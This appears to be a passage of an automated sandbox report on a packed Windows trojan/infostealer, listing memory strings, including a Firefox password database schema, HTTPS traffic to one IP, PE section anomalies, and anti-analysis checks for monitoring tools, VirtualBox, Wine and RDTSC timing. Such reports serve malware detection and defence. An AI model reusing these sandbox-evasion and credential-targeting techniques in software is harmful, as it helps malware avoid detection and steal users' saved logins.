Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: P0SJULJxI0.exe, 00000000.00000003.2068940488.0000000005D4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49704 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49705 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49711 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49776 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.8:49782 version: TLS 1.2

                System Summary

                Source: P0SJULJxI0.exe Static PE information: section name:
                Source: P0SJULJxI0.exe Static PE information: section name: .rsrc
                Source: P0SJULJxI0.exe Static PE information: section name: .idata
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Code function: 0_3_014666C5
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Code function: 0_3_05CC08D4
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Code function: 0_3_05CC08E0
                Source: P0SJULJxI0.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: P0SJULJxI0.exe Static PE information: Section: ZLIB complexity 0.9995212928921569
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/1
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: P0SJULJxI0.exe, 00000000.00000003.1627534660.0000000005C2D000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1627078020.0000000005C49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: P0SJULJxI0.exe Virustotal: Detection: 52%
                Source: P0SJULJxI0.exe ReversingLabs: Detection: 60%
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe File read: C:\Users\user\Desktop\P0SJULJxI0.exe
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: webio.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Section loaded: version.dll
                Source: P0SJULJxI0.exe Static file information: File size 2954240 > 1048576
                Source: P0SJULJxI0.exe Static PE information: Raw size of nszjqukc is bigger than: 0x100000 < 0x2a7600

                Data Obfuscation

                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Unpacked PE file: 0.2.P0SJULJxI0.exe.b50000.0.unpack :EW;.rsrc :W;.idata :W;nszjqukc:EW;kpouiknl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;nszjqukc:EW;kpouiknl:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: P0SJULJxI0.exe Static PE information: real checksum: 0x2e00dd should be: 0x2de848
                Source: P0SJULJxI0.exe Static PE information: section name:
                Source: P0SJULJxI0.exe Static PE information: section name: .rsrc
                Source: P0SJULJxI0.exe Static PE information: section name: .idata
                Source: P0SJULJxI0.exe Static PE information: section name: nszjqukc
                Source: P0SJULJxI0.exe Static PE information: section name: kpouiknl
                Source: P0SJULJxI0.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Code function: 0_3_05CC33BC push esi; retf 0_3_05CC33BF
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Code function: 0_3_05CBFA19 push ecx; retn 0005h 0_3_05CBFA42
                Source: P0SJULJxI0.exe Static PE information: section name: entropy: 7.975723556996926

                Boot Survival

                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\P0SJULJxI0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D54714 second address: D54718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D550EC second address: D550F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5521A second address: D55220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55220 second address: D55224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55313 second address: D5536A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA944B213E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FA944B213F9h 0x00000012 mov si, cx 0x00000015 pop edi 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FA944B213F8h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 jmp 00007FA944B213EDh 0x00000025 pop edi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5536A second address: D55370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55825 second address: D55887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA944B213F3h 0x00000010 nop 0x00000011 jmp 00007FA944B213F1h 0x00000016 mov esi, ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FA944B213E8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 add edi, 0391B17Ah 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pop edi 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55887 second address: D558A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5620A second address: D56210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D580A0 second address: D580A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D59ACA second address: D59AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA944B213F0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FA944B213E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5AA9C second address: D5AAA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B4DC second address: D5B4E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B4E2 second address: D5B4FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FA944C70CA1h 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FA944C70C86h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B7F3 second address: D5B7FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA944B213ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C2F1 second address: D5C317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA944C70C86h 0x00000009 jmp 00007FA944C70C95h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C317 second address: D5C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C083 second address: D5C092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C092 second address: D5C0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FA944B213ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D156AB second address: D156BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA944C70C8Dh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D156BF second address: D156C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D623CB second address: D623D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D642D0 second address: D642E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F2h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D642E9 second address: D64307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA944C70C99h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64307 second address: D64324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA944B213E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007FA944B213E6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64324 second address: D64338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA944C70C88h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D668F0 second address: D66920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944B213F9h 0x00000009 jmp 00007FA944B213F3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64A71 second address: D64A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D66920 second address: D66926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D66EB9 second address: D66EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68E9D second address: D68EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68EA2 second address: D68EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d adc di, AE37h 0x00000012 push 00000000h 0x00000014 mov edi, 6345C2E8h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA944C70C88h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov bh, EFh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68EE1 second address: D68EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D69E30 second address: D69E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D69E34 second address: D69E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6A047 second address: D6A06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA944C70C97h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6AFF5 second address: D6AFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6CECE second address: D6CED4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6A14B second address: D6A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6CED4 second address: D6CEDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6DCAF second address: D6DCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6FCE8 second address: D6FD54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FA944C70C88h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D1F86h], eax 0x0000002b push 00000000h 0x0000002d xor di, 7E5Ah 0x00000032 mov bx, si 0x00000035 xchg eax, esi 0x00000036 jo 00007FA944C70C98h 0x0000003c jmp 00007FA944C70C92h 0x00000041 push eax 0x00000042 jp 00007FA944C70C98h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FA944C70C8Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF24 second address: D6EF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF2A second address: D6EF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA944C70C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF61 second address: D6EF66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D70E43 second address: D70E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71EB2 second address: D71F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FA944B213EAh 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2F9Fh], esi 0x00000013 push 00000000h 0x00000015 cld 0x00000016 xor dword ptr [ebp+122D212Fh], eax 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D1F86h] 0x00000024 js 00007FA944B213ECh 0x0000002a push eax 0x0000002b pushad 0x0000002c jno 00007FA944B213ECh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA944B213EDh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71040 second address: D7104B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7104B second address: D71050 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71050 second address: D7106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA944C70C92h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72F7F second address: D72F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72F83 second address: D72FEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007FA944C70C93h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA944C70C88h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D3069h], ebx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D1F62h], eax 0x0000003a mov bl, 52h 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D203Dh], edi 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA944C70C91h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72FEB second address: D7301A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA944B213F2h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
